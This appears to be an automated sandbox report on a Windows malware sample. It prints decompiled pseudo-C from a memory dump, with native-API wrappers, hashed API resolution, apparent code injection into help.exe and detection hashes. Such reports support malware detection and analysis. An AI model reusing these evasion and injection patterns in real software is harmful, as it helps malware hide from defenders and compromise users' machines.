Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C820(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: a31c2487d958de86685633fd431b3ef9c8f0d30197873f4edf114e6b439d7a00
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: A2015EB5D4020DBBDB10EBA5DC82FDEB7799B54308F0041AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419f3f
0x00419f47
0x00419f7d
0x00419f81

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 961861021b5599f6e321fa2eb4d652485a26ebd9b99d875dc12ce75f1520402c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 3DF0BDB2215208ABCB08CF89DC95EEB77ADAF8C754F158248BA0D97241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A10A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A10A(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t24;

				asm("adc al, 0x81");
				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E0041AB30(_t24, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x0041a10a
0x0041a113
0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: a87c0481b7ce525c7f9dc97a06adaac07f865c1598768b4638814bc1b1a497f9
Instruction ID: efdd9516aeeb1fd07c3724d5d76106aed92c9bafcb714c98dfbbe0cf66a03886
Opcode Fuzzy Hash: a87c0481b7ce525c7f9dc97a06adaac07f865c1598768b4638814bc1b1a497f9
Instruction Fuzzy Hash: 4AF08CB1200108AFCB14DF98CC80EE77BA9EF8C310F018258FE0C97241C631E812CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041a11f
0x0041a127
0x0041a149
0x0041a14d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 37a8c631670896842b218247a062c4f669cdd6b33082669530ec9f00ac69b820
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 2BF015B2210208ABCB14DF89CC81EEB77ADAF88754F118249BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A05A, Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A05A(intOrPtr _a9, void* _a13) {
				long _t8;
				void* _t11;

				_pop(_t11);
				asm("cdq");
				_t5 = _a9;
				_t2 = _t5 + 0x10; // 0x300
				_push(0x8b552d55);
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a9, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a13); // executed
				return _t8;
			}

0x0041a05a
0x0041a05c
0x0041a063
0x0041a066
0x0041a069
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: c42c0d35b823e3e1eb5f8d0d9327b9e5a4e972d120d128a07d5f508f9033f967
Instruction ID: 96dde23a92819c03ffbf3000e01cac17463ce47079eee1fa6172b80c48cb3248
Opcode Fuzzy Hash: c42c0d35b823e3e1eb5f8d0d9327b9e5a4e972d120d128a07d5f508f9033f967
Instruction Fuzzy Hash: F6E0C2B66041106BE710DBD8CC46FEB3B59EF48360F15459AFA0CDB242C130E91287E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A060(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x0041a063
0x0041a066
0x0041a06f
0x0041a077
0x0041a085
0x0041a089

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6cd8388973e83edfd6cfca07806e1d74deb588f8289630df2fc4ecf908b9aac5
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 48D01776200214ABD710EB99CC85FE77BADEF48760F154599BA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A90(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __edi;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t47;
				intOrPtr _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;

				_t49 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t49,  &_v24); // executed
				_t51 = _t50 + 8;
				if(_t24 != 0) {
					_t40 =  &_v840;
					E00408090( &_v24,  &_v840);
					_t52 = _t51 + 8;
					_push(_t47);
					do {
						E0041B9E0(_t40, _t47,  &_v284, 0x104);
						_t40 =  &_v804;
						E0041C050( &_v284,  &_v804);
						_t53 = _t52 + 0x10;
						_t47 = 0x4f;
						while(1) {
							_t31 = E00414DC0(_t40, __eflags, E00414D60(_t49, _t47),  &_v284);
							_t53 = _t53 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - 0x62;
							if(_t47 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E004080C0( &_v24,  &_v840);
							_t52 = _t53 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t49 + 0x14; // 0xffffe045
						_t40 =  *_t9;
						_t10 = _t49 + 0x474;
						 *_t10 =  *(_t49 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E00408140(_t49,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t49 + 0x55c;
						 *_t16 =  *(_t49 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t49 + 0x31)) =  *((intOrPtr*)(_t49 + 0x31)) + _t39;
					_t20 = _t49 + 0x31; // 0x5608758b
					_t21 = _t49 + 0x32;
					 *_t21 =  *(_t49 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a9b
0x00409aa3
0x00409aa5
0x00409aaa
0x00409aaf
0x00409ab7
0x00409ac2
0x00409ac7
0x00409aca
0x00409ad0
0x00409adc
0x00409ae1
0x00409aef
0x00409af4
0x00409af7
0x00409b00
0x00409b12
0x00409b17
0x00409b1a
0x00409b1c
0x00000000
0x00000000
0x00409b1e
0x00409b1f
0x00409b22
0x00000000
0x00000000
0x00409b24
0x00409b31
0x00409b3c
0x00409b41
0x00409b44
0x00409b46
0x00000000
0x00000000
0x00000000
0x00409b46
0x00409b26
0x00409b26
0x00409b29
0x00409b29
0x00409b29
0x00409b2f
0x00000000
0x00409b48
0x00409b48
0x00409b48
0x00409b4c
0x00409b51
0x00409b5a
0x00409b5c
0x00409b5e
0x00409b64
0x00409b68
0x00409b6b
0x00409b6b
0x00409b6b
0x00409b6b
0x00409b72
0x00409b75
0x00409b7a
0x00409b7a
0x00409b7a
0x00409b87
0x00409ab6
0x00409ab6
0x00409ab6

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BA30( &_v67, 0, 0x3f);
				E0041C5D0( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A240, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A240(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB30(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a24f
0x0041a257
0x0041a26d
0x0041a271

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A200, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a217
0x0041a22d
0x0041a231

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 58E012B1210208ABDB14EF99CC41EA777ADAF88664F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A39D, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A39D(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				asm("invalid");
				_push(0x8bec8b55);
				_t7 = _a4;
				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a39d
0x0041a3a0
0x0041a3a3
0x0041a3ba
0x0041a3d0
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 604c29d152dcc3e3b2d465f44dbb217c8f219d4ca3d3f90ed22b1d0ded9c4838
Instruction ID: 6986cd69fd8c0f5e897d794c6c3b093027fd6dd3c928ab0b7b972d4fc64975ab
Opcode Fuzzy Hash: 604c29d152dcc3e3b2d465f44dbb217c8f219d4ca3d3f90ed22b1d0ded9c4838
Instruction Fuzzy Hash: 32E026B52042542BDB10DF55DD81ED73BA8DF84350F108A5EFD895B203C434E815C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3A0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A3A0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB30(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a3ba
0x0041a3d0
0x0041a3d4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A3D0

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 9e479b2eaf60326b59b5a15a73b63e8f9b290ab663b6f1255dfa49a1ae2fc0e3
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DFE01AB12002086BDB10DF49CC85EE737ADAF88650F018155BA0857241C934F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A280, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A280(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB30(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a283
0x0041a29a
0x0041a2a8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ec4c192c261470033b7d3fff11050ba2ce0bed15fbfecc5592b4580303735d53
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 29D017726142187BD620EB99CC85FD777ACDF487A0F0181A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407B0A, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00407B0A() {

				asm("lahf");
				return 1;
			}

0x00407b0a
0x00407b1a

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc5f7c62e79cedc099a67be2599f729b29b3c4c399b0dc2b828630d56d9cd8a
Instruction ID: a4bee2e994a9b7ff0dd4756bd5b3ab67408afefa0261345c83a25dd0395c55f4
Opcode Fuzzy Hash: edc5f7c62e79cedc099a67be2599f729b29b3c4c399b0dc2b828630d56d9cd8a
Instruction Fuzzy Hash: C0A00133E6A01806E5245C4DBC813B4E3A8D797639E1033A7EC09B76505487D8A2018D

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: help.exe PID: 6044 Parent PID: 3424 help.exeCOMMON

Executed Functions

Function 02429F30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02424B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02424B87,007A002E,00000000,00000060,00000000,00000000), ref: 02429F7D

Strings

.z`, xrefs: 02429F6D, 02429F78

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: ab1fe43ee9fee9368b51e9661a5fe06231b9822a07ecd4262e81217113208cfc
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 2DF0B2B2210208ABCB08CF89DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02429FE0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02424D42,5EB6522D,FFFFFFFF,02424A01,?,?,02424D42,?,02424A01,FFFFFFFF,5EB6522D,02424D42,?,00000000), ref: 0242A025

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: cd49d1d8392f021ffd58fd70adde17cf8554ff005a569108850e150e2ac23b95
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 57F0B7B2210218AFCB14DF89DC90EEB77ADEF8C754F158249BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A10A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02412D11,00002000,00003000,00000004), ref: 0242A149

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 79cf2a3a92547ad92c33cbe1af3fe3a46962240d29b7107e4a8aeaea31e52699
Instruction ID: 4009404116428d40edc321c2fa8e7aefb21a49c7026cc6d1c4a9c0c809423045
Opcode Fuzzy Hash: 79cf2a3a92547ad92c33cbe1af3fe3a46962240d29b7107e4a8aeaea31e52699
Instruction Fuzzy Hash: 6CF01CB1200119AFCB14DF99CC90EE77BA9EF9D350F158259FE0D97241C631E912CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A110, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02412D11,00002000,00003000,00000004), ref: 0242A149

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 402a8811bfe0c4264addddcc86e54bb980a66a19a26e35b4e32ebe6616a74751
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: DBF015B2210218ABCB14DF89CC80EAB77ADAF88750F118249BE0897241C630F811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A05A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02424D20,?,?,02424D20,00000000,FFFFFFFF), ref: 0242A085

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 285e2d27eac973bf87d7b58d94531f1abf306b8ffd0301adb9c37a3efe900b9c
Instruction ID: 9aa4dd697fb7c6de32621a8213f6318c868f6cd164dfc58d877cc83d372d0ce3
Opcode Fuzzy Hash: 285e2d27eac973bf87d7b58d94531f1abf306b8ffd0301adb9c37a3efe900b9c
Instruction Fuzzy Hash: 2DE0C2B66001206BE710DBD8CC45FEB7B5AEF48360F15459AFE0CDB242C130E90287E0

Uniqueness

Uniqueness Score: -1.00%

Function 0242A060, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02424D20,?,?,02424D20,00000000,FFFFFFFF), ref: 0242A085

Memory Dump Source

Source File: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 6ccfe57d38c9900e8556f7946659a64c22032d4001f0d228e7d9055ebb504c76
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: E9D01776600224ABD710EB99CC85FA7BBADEF48760F554599BA189B242C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02AC96EA

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 510652c1f0670a1c0eccf39f2388dd3f33aa35369c9f9dfc3af525a2c5959b6b
